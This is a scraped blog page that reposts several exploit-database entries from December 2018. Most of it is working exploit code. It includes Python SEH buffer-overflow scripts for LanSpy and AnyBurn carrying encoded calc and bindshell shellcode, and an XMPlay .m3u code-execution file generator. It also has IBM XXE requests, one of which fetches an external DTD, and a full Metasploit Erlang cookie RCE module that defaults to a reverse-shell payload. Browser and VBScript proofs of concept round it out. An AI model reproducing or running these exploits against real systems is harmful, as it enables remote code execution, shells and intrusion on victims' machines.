# Exploit Title: LanSpy 2.0.1.159 - Local Buffer Overflow (SEH) (Egghunter)
# Exploit Author: bzyo
# Date: 12-19-18
# Twitter: @bzyo_
# Vulnerable Software: LanSpy 2.0.1.159
# Vendor Homepage: https://lizardsystems.com
# Version: 2.0.1.159
# Software Link 1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
# Software Link 2: https://lizardsystems.com/download/lanspy_setup.exe
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. copy/paste calcpayload.txt contents into scan section of app
# 3. remove previous search contents
# 4. copy/paste egghpayload.txt contents into scan section of app
# 5. wait for egg to be found
# 6. pop calc
# was working on this when i saw seh poc published
# submitting for the lulz
# original dos poc from Gionathan "John" Reale, EDB: 45968
# original seh poc from Juan Prescotto, EDB: 46009
#badchars; 0's 1's and 20; maybe more?
#!/usr/bin/python
import struct
file1="calcpayload.txt"
file2="egghpayload.txt"
#egghunter payload
junk3 = "A"*506
#125 bytes encoded egghunter 'BZYO'
#msfvenom -p generic/custom PAYLOADFILE=eggh -e x86/alpha_mixed -f python
eggh = ""
eggh += "\x89\xe5\xdd\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
eggh += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
eggh += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
eggh += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
eggh += "\x50\x38\x41\x42\x75\x4a\x49\x62\x46\x6e\x61\x6b\x7a"
eggh += "\x39\x6f\x34\x4f\x71\x52\x76\x32\x63\x5a\x45\x52\x63"
eggh += "\x68\x6a\x6d\x54\x6e\x37\x4c\x54\x45\x31\x4a\x30\x74"
eggh += "\x78\x6f\x78\x38\x42\x6f\x50\x59\x43\x6a\x53\x72\x6c"
eggh += "\x4b\x68\x7a\x6e\x4f\x31\x65\x4a\x4a\x6e\x4f\x31\x65"
eggh += "\x4b\x57\x6b\x4f\x6b\x57\x41\x41"
#jump to eggh
jmp2 = "\xe9\x30\xff\xff\xff"
junk2 = "\xcc"*6
#jump to jmp2
jmp1 = "\xcc\xcc\xeb\xf1\xcc\xcc"
junk1 = "\xcc"*16
#jump to jmp1
nseh = "\xeb\xea\xcc\xcc"
#0x00458148 : pop ecx # pop ebp # ret 0x04
seh = struct.pack('<L',0x00458148)
#10 nops
nops = "\x90"*10
egghpayload = junk3 + nops + eggh + nops + jmp2 + junk2 + jmp1 + junk1 + nseh + seh
#calc payload
calcjunk1 = "D"*26
#8 byte egg
bzyo = "OYZBOYZB"
#440 bytes for calc
#msfvenom -p windows/exec CMD="calc" -e x86/alpha_mixed -f python
calc = ""
calc += "\x89\xe2\xdd\xc5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49"
calc += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
calc += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
calc += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
calc += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x58\x68\x6f"
calc += "\x72\x63\x30\x53\x30\x55\x50\x45\x30\x4b\x39\x79\x75"
calc += "\x54\x71\x39\x50\x33\x54\x4e\x6b\x52\x70\x66\x50\x6c"
calc += "\x4b\x73\x62\x34\x4c\x4c\x4b\x71\x42\x32\x34\x4c\x4b"
calc += "\x71\x62\x47\x58\x34\x4f\x4e\x57\x62\x6a\x46\x46\x35"
calc += "\x61\x6b\x4f\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x74\x42"
calc += "\x76\x4c\x71\x30\x4f\x31\x68\x4f\x76\x6d\x77\x71\x7a"
calc += "\x67\x5a\x42\x58\x72\x56\x32\x32\x77\x4c\x4b\x43\x62"
calc += "\x52\x30\x6e\x6b\x30\x4a\x67\x4c\x4c\x4b\x50\x4c\x34"
calc += "\x51\x44\x38\x49\x73\x50\x48\x35\x51\x5a\x71\x76\x31"
calc += "\x6c\x4b\x66\x39\x37\x50\x33\x31\x78\x53\x6c\x4b\x53"
calc += "\x79\x57\x68\x69\x73\x56\x5a\x77\x39\x4e\x6b\x46\x54"
calc += "\x6c\x4b\x56\x61\x6a\x76\x30\x31\x4b\x4f\x4c\x6c\x49"
calc += "\x51\x48\x4f\x44\x4d\x47\x71\x59\x57\x65\x68\x4b\x50"
calc += "\x52\x55\x69\x66\x34\x43\x71\x6d\x4b\x48\x37\x4b\x63"
calc += "\x4d\x66\x44\x70\x75\x4b\x54\x63\x68\x4c\x4b\x70\x58"
calc += "\x31\x34\x75\x51\x4a\x73\x45\x36\x6e\x6b\x76\x6c\x42"
calc += "\x6b\x4e\x6b\x32\x78\x67\x6c\x57\x71\x59\x43\x4e\x6b"
calc += "\x47\x74\x4e\x6b\x45\x51\x68\x50\x4d\x59\x30\x44\x34"
calc += "\x64\x61\x34\x43\x6b\x31\x4b\x61\x71\x70\x59\x70\x5a"
calc += "\x70\x51\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x42\x7a\x6e"
calc += "\x6b\x47\x62\x48\x6b\x4c\x4d\x31\x4d\x52\x4a\x77\x71"
calc += "\x4e\x6d\x6f\x75\x6e\x52\x53\x30\x65\x50\x57\x70\x30"
calc += "\x50\x50\x68\x50\x31\x6e\x6b\x52\x4f\x4f\x77\x39\x6f"
calc += "\x69\x45\x4f\x4b\x68\x70\x6f\x45\x39\x32\x36\x36\x52"
calc += "\x48\x4e\x46\x6c\x55\x6d\x6d\x4f\x6d\x49\x6f\x4a\x75"
calc += "\x57\x4c\x36\x66\x53\x4c\x35\x5a\x4f\x70\x49\x6b\x39"
calc += "\x70\x53\x45\x74\x45\x6f\x4b\x71\x57\x45\x43\x33\x42"
calc += "\x70\x6f\x52\x4a\x65\x50\x66\x33\x59\x6f\x7a\x75\x55"
calc += "\x33\x33\x51\x32\x4c\x65\x33\x33\x30\x41\x41"
calcjunk2 = "E"*30
calcpayload = calcjunk1 + bzyo + calc + calcjunk2
textfile = open(file1 , 'w')
textfile.write(calcpayload)
textfile.close()
textfile = open(file2 , 'w')
textfile.write(egghpayload)
textfile.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863588074
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
# Date: 2018-12-19
# Exploit Author: s7acktrac3
# Vendor Homepage: https://www.xmplay.com/
# Software Link: https://support.xmplay.com/files_view.php?file_id=676
# Version: 3.8.3 (latest)
# Tested on: Windows XP SP3
# CVE : Reserved
#
# Developer notified & delivered PoC but not interested in fixing :P
#
# Reproduction Steps:
# Lauch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u
# Either drag xmplay.m3u into the XMPlay window or File Menu-> select winamp.m3u. Application will "load"
# for a minute (exploit searching through memory for payload) and eventually launch calc.exe
#
# Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a
# beast!
from struct import pack
max_size = 728
# C:\Documents and Settings\Administrator\Desktop\Exploit Dev\xmplay_383-poc.py
eip_offset = 500
file_header = "#EXTM3U\n\r"
file_header += "#EXTINF:200,Sleep Away\n\r"
file_header += "http://test."
# cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin
# msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
encoded_egg_hunter = (""
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
"\x38\x41\x42\x75\x4a\x49\x62\x46\x6f\x71\x4b\x7a\x49\x6f\x44"
"\x4f\x53\x72\x36\x32\x61\x7a\x46\x62\x66\x38\x78\x4d\x64\x6e"
"\x75\x6c\x75\x55\x63\x6a\x54\x34\x68\x6f\x6d\x68\x63\x47\x34"
"\x70\x54\x70\x72\x54\x4e\x6b\x58\x7a\x4e\x4f\x42\x55\x6b\x5a"
"\x4c\x6f\x31\x65\x78\x67\x59\x6f\x39\x77\x41\x41")
encoded_calc = "w00tw00t" + "\x57\x58\x04\x06\x50\x5E" # PUSH EDI, POP EAX, ADD AL,6, PUSH EAX, POP ESI
encoded_calc += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
encoded_calc += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
encoded_calc += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
encoded_calc += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
encoded_calc += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
encoded_calc += "\x4a\x49\x36\x51\x49\x59\x52\x71\x61\x78"
encoded_calc += "\x75\x33\x50\x61\x72\x4c\x31\x73\x73\x64"
encoded_calc += "\x6e\x58\x49\x57\x6a\x33\x39\x52\x64\x37"
encoded_calc += "\x6b\x4f\x38\x50\x41\x41"
egg_addr_to_edx = ""
egg_addr_to_edx += "\x54" # PUSH ESP
egg_addr_to_edx += "\x58" # POP EAX
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x50" # PUSH eax
egg_addr_to_edx += "\x5A" # POP EDX
payload = "A" * 12
payload += encoded_calc
payload += "A" * (eip_offset - len(payload))
print "Length of payload " + str(len(payload))
payload += pack("<L", 0x78196d4d) # Jmp esp OS DLL
payload += "BBBB"
payload += egg_addr_to_edx
payload += "C" * (76 - len(egg_addr_to_edx) )
payload += encoded_egg_hunter
payload += "C" * (max_size - len(payload))
stupid_char = "|"
print "[+] Creating .m3u file with payload size: "+ str(len(payload))
exploit = file_header + payload + stupid_char
file = open('xmplay.m3u','w')
file.write(exploit)
file.close();
print "[+] Done creating the file"
# Exploit Title: [XML External Entity Injection (XXE)]
# Date: [2018-12-18]
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10744149]
# Version: [v8.6 - v8.7 - v8.8 - v8.9] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [CVE-2018-1821]
POC#1: Port Scanning:
======================
POST /res/api/v1/ruleapps?csrf_token=kgwGZpsLIpCrCuS3s2mLS4%2BuXKM%3D HTTP/1.1
Host: 172.25.28.35:9443
Connection: close
Content-Length: 83
Origin: https://172.25.28.35:9443
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Content-Type: application/xml
Accept: */*
Referer: https://172.25.28.35:9443/res/protected/rest.jsf
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=0000EKq5uAZFEICNv26D32qeVid:1c4i4k9om; LtpaToken2=Py4PGunQHKXqtYpW0R+1XxlcENqSI/5/RCinV7Cl0g8WlAWAfff5IAPwHJDWZL+LFtTTT+tfmADp38hW7xVieS74jJB79m1IDfIpeGvKOzJ99NmTkV0uPm22vdUZp8qKF8Xt3J7mO5L1tTohHdIg/eXZj2hZxWfLYf2KyGyqJ+D16g4fIu7zazZProW9RDgdoGpppM/Wfkxst8iQAj6+4a3tdyJkNJ8+QdPeakHYCbFA6aTcNXncwkWsKDwznGZ30pLXSxp8wKJaESkkuY5F4w6lLGVw7d6p34M6aDQGixkR4J7I+ZLQ0OE9Fzt6Aq+AETBcMLFqPOpPEMtrZkkExey8Lc9hMRs5tAVXramTT6h38uquu/2DyqfOaJeRATM8tO4UZs7clSsXQjsbU9s/ueFZR8YA9qrXUTChoysZtCrXTdmqs87FiqwLZNzWI7bUjf8crCNDJgYzPVsnK0Oo46Hdi8nlKhvr8pzxSMblS4gjgSsKo8MYDi/uzexkqMB3ddTGp9vUVEG30L9Ya9Z4v7D9WusN7fJxn1x3g9NmtWMe6uCsyIRFU0+RADGsKYfsC09NItUciIo9GnJdrsla9TnaqVaiQhu85GpT6LPrZs0wPjV6WYGTOLMMd2Z/VVjaTn9pU5mPQlT/dFVbLoJvNI+uS66GP1HmXgj8ofe5J/o=
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "ftp://127.0.0.1:21">
POC#2: Using External DTD File:
======================================
POST /rest/bpm/monitor/events HTTP/1.1
Host: 172.25.28.41:9445
Connection: close
Cache-Control: max-age=0
Authorization: Basic Ym1hZG1pbjpibWFkbWlu
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPAction: "CBE_FOR_EACH_TRANSACTION_REQUESTI"
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=00002W7K2hStpCQu03vef0J3Lyt:1cd2vk5q4; com.ibm.wbimonitor.UserName=bmadmin; MUMLogoutURL=https://172.25.28.41:9445/mum/logout; LtpaToken2=RKW0datOtQMYCPkxs8YAKklRMLNsYHWe264hjvsRMBjvc6AW29/OVsNJA8pO8MQQMBXOfBuWtNQPWVJ/cw55YdzVyfPdLG8d+cQ77kt7XiE77scfNfPCVU77zcFaG8qVO8xUXXX5U4+nTxlXNIEQR1iMPN2+w3rnAIZcDL7vgK3YN0QPGAn8rQmrYswXoBf6WmgI8uc0yA/PNRIXL5Lt9DeqJCU0C/E2FvJ9nK8T8uQqPPiS63EOutom825arJYLV9zndN1ArgdwAAOMO61Top9bM/VsMh/ryshaj6CsfrmaBvFt5FIVfvLN5u2iEQq0KVCxPAlH5yceSQV5gP884rhiN9M1N/QOQ54k3F1ZMBkfhDofJyDqsXMOMCaTXTsoyWhsC/KLPcjC3thQQxxijDrM7Yql411tUDv08xdDzu7apEF5QBuGrVd2Pgg5luKWmcao5BduwSXwaKJEQXnULAbYacr48gol7aHJucPhY6JqkFgvjvV4XfFNM1jsWbA+09KD2F0GALjNzLMb54sI5RLhHLVZu/LBL3RWrZFPPSE0D9YW2LrKtNGHBkFeuw/I8ULL/JjlfWHHheZug5t45H1oNPHpQp843GwTAbWGtNCb7rZLgA7+jCR2OYmtg8vrlJFvSzhSxg6ahYppX1PouekOuNvC7EvR51PHcw2qJRE=
Content-Length: 99
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://172.17.85.67:5555/mydtd.dtd">
There is an reference leak in Microsoft VBScript that can be turned into an use-after-free given sufficient time. The vulnerability has been confirmed in Internet Explorer on various Windows versions with the latest patches applied.
Details:
VbsErase function is used to reset and free the contents of a VBScript array. When this function is called on a VBScript variable of the type array (implemented as a VAR structure containing a type followed by a value, in this case a pointer to a SafeArray object), the function follows these steps:
1. Get the pointer to a SafeArray object from the VBScript variable and store it locally
2. Set the pointer value in the VBScript variable to 0 (null)
3. Release the array members (by calling SafeArrayDestroyData)
4. Restore the pointer from step 2
5. Destroy the array object itself (by calling SafeArrayDestroyDescriptor)
6. Once again, set the pointer value in the VBScript variable to null
The dance with setting the pointer to null and restoring it was made to address previously reported vulnerabilities described in http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html.
However, this also introduced another bug. Specifically, if during SafeArrayDestroyData a user-defined callback runs, the callback can set the value of the VBScript variable passed to VbsErase to some other object (which increases the reference count of the object). If that happens, in steps 4 and 6 above, the pointer to the object will be overwritten, thus preventing its reference count to get properly decremented when the VBScript variable is assigned some other value.
Consider the following code snippet:
====================================
Class class1
End Class
Class class2
Private Sub Class_Terminate()
' increase the reference count of c
set a = c
End Sub
End Class
' create an object of class1 and increase its reference count
c = new class1
a = Array(0)
set a(0) = new class2
' call Class_Terminate of class2
Erase a
' a has been set to null so the following line doesn't affect c in any way
a = 1
' decrease the reference count of c
c = 1
' at this point the referenc couter of c is 1 instead of 0
====================================
When the code snippet finishes, the class1 object createad on the first line continues to live, even though all references to it have been lost so it should have been destroyed. This same principle can be used to increase the reference count of an arbitrary object any number of times without incurring a memory cost, eventually overflowing the 32-bit reference counter.
Note that, while custom classes in VBScript have protection against overflowing a reference counter, this isn't the case for built-in objects (compare VBScriptClass::AddRef to AddRef methods of other classes). Because of this, the PoCs below use a RegExp object.
The only problem is that for every reference counter increment, a new array has to be created and destroyed and a user-defined Class_Terminate needs to run which all takes time. Overflowing the 32-bit reference counter can take around 2 hours (depending on the CPU) and way longer if page heap is enabled for the iexplore.exe process.
leak1.html (in attachment) contains the full PoC and leak1.txt contains a debug log for this.
If you don't want to wait, a quicker way to demonstrate the issue is to just run the reference counter increase for certain number of iterations, and then increase it further (close to overflowing) via a debugger.
leak2.html demonstrates this and leak2.txt contains the debug log (obtained in a 64 bit process with page heap enabled).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46022.zip
# Exploit Title: Microsoft Edge edgehtml.dll!Tree::ANode::DocumentLayout. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-11
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.microsoft.com/
# Version: Microsoft Edge 42.17134.1.0 (Microsoft EdgeHTML 17.17134)
# Tested on: Windows 10 x64
# CVE : N/A
# Description:
# Access violation while reading memory at 0x5C using a NULL pointer (microsoftedgecp.exe!edgehtml.dll!Tree::ANode::DocumentLayout)
# https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/19594021/
PoC.html
<html>
<head>
<script>
function ff() {
var v4= document.elementFromPoint(0,0);
v2.label = "C";
var v3= document.execCommand("selectAll", true);
}
</script>
</head>
<body onload=ff()>
<select id="1" multiple="multiple">
<optgroup id="v2" label="A">
<option id="v1">
</body>
</html>
According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, Starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.
However, the VBScript execution policy does not appear to cover VBScript code in MSXML xsl files which can still execute VBScript, even when loaded from the Internet Zone.
To demonstrate, place the files in the attached archive on a web server in the Internet zone and open index.html. If successful, the text "Hello from VBscript" will be rendered on the page. If you look at the provided code, this text is assembled dynamically by VBScript.
This has been tested on Windows 10 Version 1803 with the latest patches applied and VBScript execution policy applied for the Internet Zone (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\140C = 3).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46023.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Erlang Port Mapper Daemon Cookie RCE',
'Description' => %q{
The erlang port mapper daemon is used to coordinate distributed erlang instances.
Should an attacker get the authentication cookie RCE is trivial. Usually, this
cookie is named ".erlang.cookie" and varies on location.
},
'Author' =>
[
'Daniel Mende', # blog post article
'Milton Valencia (wetw0rk)', # metasploit module
],
'References' =>
[
['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'win'],
'Arch' => ARCH_CMD,
'Privileged' => 'false',
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
],
[ 'Windows',
'Platform' => 'win',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)
)
)
register_options(
[
OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),
Opt::RPORT(25672)
])
end
def generate_challenge_digest(challenge)
challenge = challenge.unpack('H*')[0].to_i(16).to_s
hash = Digest::MD5.new
hash.update(datastore['COOKIE'])
hash.update(challenge)
vprint_status("MD5 digest generated: #{hash.hexdigest}")
return [hash.hexdigest].pack('H*')
end
def exploit
connect
our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
# SEND_NAME: send initial identification of who "we" are
send_name = "\x00" # Length: 0x0000
send_name << [(our_node.length+7).to_s(16)].pack('H*') #
send_name << "\x6e" # Tag: n
send_name << "\x00\x05" # Version: R6 (5)
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
send_name << "#{our_node}" # <generated>@<generated>
# SEND_CHALLENGE_REPLY: return generated digest and its own challenge
send_challenge_reply = "\x00\x15" # Length: 21
send_challenge_reply << "\x72" # Tag: r
# SEND: send the message to the node
send = "\x00\x00\x00" # Length:0x00000000
send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') #
send << "\x70" #
send << "\x83" # VERSION_MAGIC
send << "\x68" # SMALL_TUPLE_EXT (104)
send << "\x04" # Arity: 4
send << "\x61" # SMALL_INTEGER_EXT
send << "\x06" # Int: 6
send << "\x67" # PID_EXT (103)
send << "\x64\x00" # Node:
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{our_node}" # Node
send << "\x00\x00\x00\x03" # ID
send << "\x00\x00\x00\x00" # Serial
send << "\x00" # Creation
send << "\x64" # InternalSegmentIndex
send << "\x00\x00" # Len: 0x0000
send << "\x64" # InternalSegmentIndex
send << "\x00\x03" # Length: 3
send << "rex" # AtomText: rex
send << "\x83\x68\x02\x67\x64\x00" #
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{our_node}" # Node
send << "\x00\x00\x00\x03" # ID
send << "\x00\x00\x00\x00" # Serial
send << "\x00" # Creation
send << "\x68" # SMALL_TUPLE_EXT (104)
send << "\x05" # Arity: 5
send << "\x64" # InternalSegmentIndex
send << "\x00\x04" # Length: 4
send << "call" # AtomText: call
send << "\x64" # InternalSegmentIndex
send << "\x00\x02" # Length: 2
send << "os" # AtomText: os
send << "\x64" # InternalSegmentIndex
send << "\x00\x03" # Length: 3
send << "cmd" # AtomText: cmd
send << "\x6c" # LIST_EXT
send << "\x00\x00\x00\x01" # Length: 1
send << "\x6b" # Elements: k
send << "\x00" # Tail
send << [(payload.raw.length).to_s(16)].pack('H*') # strlen(Command)
send << payload.raw # Command
send << "\x6a" # NIL_EXT
send << "\x64" # InternalSegmentIndex
send << "\x00\x04" # Length: 4
send << "user" # AtomText: user
sock.put(send_name)
# recieve servers "SEND_CHALLENGE" token (4 bytes)
print_status("Receiving server challenge")
challenge = sock.get
challenge = challenge[14,4]
send_challenge_reply << challenge
send_challenge_reply << generate_challenge_digest(challenge)
print_status("Sending challenge reply")
sock.put(send_challenge_reply)
if sock.get.length < 1
fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}")
end
print_good("Authentication successful, sending payload")
sock.put(send)
end
end
#!/usr/bin/env python
# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
# Date: 20-12-2018
# Exploit Author: Matteo Malvica
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64 SP1
# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002
# Steps to reproduce:
# 1.- Run the python code
# 2.- Open exploit.txt and copy its content to the clipboard
# 3.- Open AnyBurn and choose 'Copy disk to Image'
# 4.- Paste the content of exploit.txt into the field: 'Image file name'
# 5.- Click 'Create Now'
# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'
# alphanumeric bindshell - port 9988, courtesy of b33f
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
"AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
"BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
"BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
"KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
"1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
"CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
"JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
"IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
"K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
"SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
"WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
"6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
"EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")
# total payload length 10000
align = (
"\x55" #push EBP - closer register to our shellcode, from where we are pivoting
"\x6e" #Venetian Padding
"\x58" #pop EAX
"\x6e" #Venetian Padding
"\x05\x22\x11" #add eax,0x11002200 \
"\x6e" #Venetian Padding |> +0xB00
"\x2d\x17\x11" #sub eax,0x11001700 /
"\x6e" #Venetian Padding
"\x50" #push EAX
"\x6e" #Venetian Padding
"\xC3") #RETN
nseh = "\x94\x94" # ANSI x94 translates to Unicode 201D
seh = "\xb5\x4d" # 0x004d00b5 POP POP RET in AnyBurn.exe module
preamble = "\x58" * 47 + shellcode + "\x58" * (9197-47- len(shellcode)) + nseh + seh
unicode_nops = "\x58" * 200
exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops)-len(align))
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes lasagna payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: McAfee Foundstone SQLScan - Denial of Service (PoC) and EIP record overwrite
# Discovery by: Rafael Pedrero
# Discovery Date: 2018-12-20
# Vendor Homepage: http://www.mcafee.com/us/downloads/free-tools/sqlscan.aspx
# Software Link : http://www.mcafee.com/us/downloads/free-tools/sqlscan.aspx
# Tested Version: 1.0.0.0
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run SQLScan
# 2.- copy content SQLScan_Crash.txt to clipboard (result from this python script)
# 3.- Paste the content into the field: 'Hostname/IP'
# 4.- Click '->' button and you will see a crash.
'''
EAX 00000001
ECX 0012F8CC
EDX 7C91E4F4 ntdll.KiFastSystemCallRet
EBX 00000000
ESP 0012FA80
EBP 42424242
ESI 00402FEB SQLScan.00402FEB
EDI 0012FAD0
EIP 43434343
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 1 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010296 (NO,NB,NE,A,S,PE,L,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
'''
#!/usr/bin/env python
junk = "\x41" * 384
crash = junk + "BBBB" + "CCCC"
f = open ("SQLScan_Crash.txt", "w")
f.write(crash)
f.close()
The bug is in “MsiAdvertiseProduct”
Calling this function will result in a file copy by the installer service.
This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer … a check gets done while impersonating, but using junctions there is still a TOCTOU .. meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results an in arbitrary file read vulnerability.
To reproduce:
Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory.
Useage: readfile.exe targetfile (where targetfile is the file to read, IE: “readfile.exe c:\users\test\desktop\desktop.ini”)
